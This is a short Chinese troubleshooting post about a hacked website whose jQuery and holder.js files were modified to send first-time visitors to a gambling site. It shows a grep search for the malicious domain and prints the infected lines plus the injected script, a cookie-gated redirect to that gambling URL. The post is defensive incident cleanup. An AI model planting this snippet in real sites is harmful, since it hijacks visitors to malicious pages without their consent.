现象:
第一次访问网站会自动跳转到第三方菠菜页面https://sdfhu1.com/481358.html,第二次访问就不会了。
原因:
网站js文件被挂马
解决办法:
根据https://sdfhu1.com/481358.html这个域名查找被挂马的文件
grep -rn "sdfhu1.com" *
参数说明:
-n 是显示行号
* : 表示当前目录所有文件,也可以是某个文件名
找到了这两个文件,发现最后几行被添加了跳转第三方。
static/global/vendor/jquery/jquery.min.js:14: window.location.href='https://sdfhu1.com/481358.html'; static/js/holder.js:2989: window.location.href='https://sdfhu1.com/481358.html';
参考代码
var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://sdfhu1.com/33720.html'; }